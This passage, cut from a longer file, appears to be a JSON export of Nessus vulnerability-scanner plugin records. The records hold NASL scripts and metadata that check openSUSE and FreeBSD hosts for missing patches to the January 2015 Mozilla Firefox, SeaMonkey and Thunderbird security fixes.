LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81142);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\", \"CVE-2014-8643\");\n\n script_name(english:\"openSUSE Security Update : seamonkey (openSUSE-SU-2015:0192-1)\");\n script_summary(english:\"Check for the openSUSE-2015-92 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla seamonkey was updated to SeaMonkey 2.32 (bnc#910669)\n\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous\n memory safety hazards\n\n - MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized\n memory use during bitmap rendering\n\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon\n requests lack an Origin header\n\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie\n injection through Proxy Authenticate responses\n\n - MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of\n uninitialized memory in Web Audio\n\n - MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free\n in WebRTC\n\n - MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only)\n Gecko Media Plugin sandbox escape\n\n - MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP\n responder certificates failure with id-pkix-ocsp-nocheck\n extension\n\n - MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper\n bypass through DOM objects\n\n - use GStreamer 1.0 from 13.2 on\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-02/msg00008.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected seamonkey packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-irc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:seamonkey-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"seamonkey-2.32-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"seamonkey-debuginfo-2.32-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"seamonkey-debugsource-2.32-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"seamonkey-dom-inspector-2.32-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"seamonkey-irc-2.32-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"seamonkey-translations-common-2.32-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"seamonkey-translations-other-2.32-44.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"seamonkey-2.32-8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"seamonkey-debuginfo-2.32-8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"seamonkey-debugsource-2.32-8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"seamonkey-dom-inspector-2.32-8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"seamonkey-irc-2.32-8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"seamonkey-translations-common-2.32-8.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"seamonkey-translations-other-2.32-8.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"seamonkey / seamonkey-debuginfo / seamonkey-debugsource / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:25", "description": "The Mozilla Project reports :\n\nMFSA-2015-01 Miscellaneous memory safety hazards (rv:35.0 / rv:31.4)\n\nMFSA-2015-02 Uninitialized memory use during bitmap rendering\n\nMFSA-2015-03 sendBeacon requests lack an Origin header\n\nMFSA-2015-04 Cookie injection through Proxy Authenticate responses\n\nMFSA-2015-05 Read of uninitialized memory in Web Audio\n\nMFSA-2015-06 Read-after-free in WebRTC\n\nMFSA-2015-07 Gecko Media Plugin sandbox escape\n\nMFSA-2015-08 Delegated OCSP responder certificates failure with id-pkix-ocsp-nocheck extension\n\nMFSA-2015-09 XrayWrapper bypass through DOM objects", "cvss3": {}, "published": "2015-01-15T00:00:00", "type": "nessus", "title": "FreeBSD : mozilla -- multiple vulnerabilities (bd62c640-9bb9-11e4-a5ad-000c297fb80f)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642", "CVE-2014-8643"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:firefox", "p-cpe:/a:freebsd:freebsd:firefox-esr", "p-cpe:/a:freebsd:freebsd:libxul", "p-cpe:/a:freebsd:freebsd:linux-firefox", "p-cpe:/a:freebsd:freebsd:linux-seamonkey", "p-cpe:/a:freebsd:freebsd:linux-thunderbird", "p-cpe:/a:freebsd:freebsd:seamonkey", "p-cpe:/a:freebsd:freebsd:thunderbird", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_BD62C6409BB911E4A5AD000C297FB80F.NASL", "href": "https://www.tenable.com/plugins/nessus/80538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80538);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\", \"CVE-2014-8643\");\n\n script_name(english:\"FreeBSD : mozilla -- multiple vulnerabilities (bd62c640-9bb9-11e4-a5ad-000c297fb80f)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Mozilla Project reports :\n\nMFSA-2015-01 Miscellaneous memory safety hazards (rv:35.0 / rv:31.4)\n\nMFSA-2015-02 Uninitialized memory use during bitmap rendering\n\nMFSA-2015-03 sendBeacon requests lack an Origin header\n\nMFSA-2015-04 Cookie injection through Proxy Authenticate responses\n\nMFSA-2015-05 Read of uninitialized memory in Web Audio\n\nMFSA-2015-06 Read-after-free in WebRTC\n\nMFSA-2015-07 Gecko Media Plugin sandbox escape\n\nMFSA-2015-08 Delegated OCSP responder certificates failure with\nid-pkix-ocsp-nocheck extension\n\nMFSA-2015-09 XrayWrapper bypass through DOM objects\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-02/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-05/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-07/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-08/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-09/\"\n );\n # https://www.mozilla.org/security/advisories/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/\"\n );\n # https://vuxml.freebsd.org/freebsd/bd62c640-9bb9-11e4-a5ad-000c297fb80f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a25533e4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox-esr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libxul\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"firefox<35.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"firefox-esr<31.4.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-firefox<35.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-seamonkey<2.32\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-thunderbird<31.4.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"seamonkey<2.32\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"thunderbird<31.4.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"libxul<31.4.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:53", "description": "MozillaFirefox was updated to version 35.0 (bnc#910669)\n\nNotable features :\n\n - Firefox Hello with new rooms-based conversations model\n\n - Implemented HTTP Public Key Pinning Extension (for enhanced authentication of encrypted connections)\n\nSecurity fixes :\n\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous memory safety hazards\n\n - MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized memory use during bitmap rendering\n\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an Origin header\n\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy Authenticate responses\n\n - MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of uninitialized memory in Web Audio\n\n - MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n\n - MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only) Gecko Media Plugin sandbox escape\n\n - MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP responder certificates failure with id-pkix-ocsp-nocheck extension\n\n - MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper bypass through DOM objects\n\n - obsolete tracker-miner-firefox < 0.15 because it leads to startup crashes (bnc#908892)", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "nessus", "title": "openSUSE Security Update : MozillaFirefox (openSUSE-SU-2015:0077-2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642", "CVE-2014-8643"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols", "p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo", "p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox-devel", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-40.NASL", "href": "https://www.tenable.com/plugins/nessus/80843", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-40.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80843);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\", \"CVE-2014-8643\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (openSUSE-SU-2015:0077-2)\");\n script_summary(english:\"Check for the openSUSE-2015-40 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MozillaFirefox was updated to version 35.0 (bnc#910669)\n\nNotable features :\n\n - Firefox Hello with new rooms-based conversations model\n\n - Implemented HTTP Public Key Pinning Extension (for\n enhanced authentication of encrypted connections)\n\nSecurity fixes :\n\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous\n memory safety hazards\n\n - MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized\n memory use during bitmap rendering\n\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon\n requests lack an Origin header\n\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie\n injection through Proxy Authenticate responses\n\n - MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of\n uninitialized memory in Web Audio\n\n - MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free\n in WebRTC\n\n - MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only)\n Gecko Media Plugin sandbox escape\n\n - MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP\n responder certificates failure with id-pkix-ocsp-nocheck\n extension\n\n - MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper\n bypass through DOM objects\n\n - obsolete tracker-miner-firefox < 0.15 because it leads\n to startup crashes (bnc#908892)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=908892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-01/msg00039.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-01/msg00042.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-35.0-54.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-branding-upstream-35.0-54.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-buildsymbols-35.0-54.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-debuginfo-35.0-54.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-debugsource-35.0-54.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-devel-35.0-54.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-translations-common-35.0-54.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"MozillaFirefox-translations-other-35.0-54.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-35.0-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-branding-upstream-35.0-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-buildsymbols-35.0-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-debuginfo-35.0-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-debugsource-35.0-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-devel-35.0-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-translations-common-35.0-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"MozillaFirefox-translations-other-35.0-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / MozillaFirefox-branding-upstream / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:47:05", "description": "The version of Firefox installed on the remote Windows host is prior to 35.0. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists where DOM objects with some specific properties can bypass XrayWrappers. This can allow web content to confuse privileged code, potentially enabling privilege escalation. (CVE-2014-8636)\n\n - A flaw exists in the rendering of bitmap images. When rending a malformed bitmap image, memory may not always be properly initialized, which can result in a leakage of data to web content. (CVE-2014-8637)\n\n - A flaw exists in 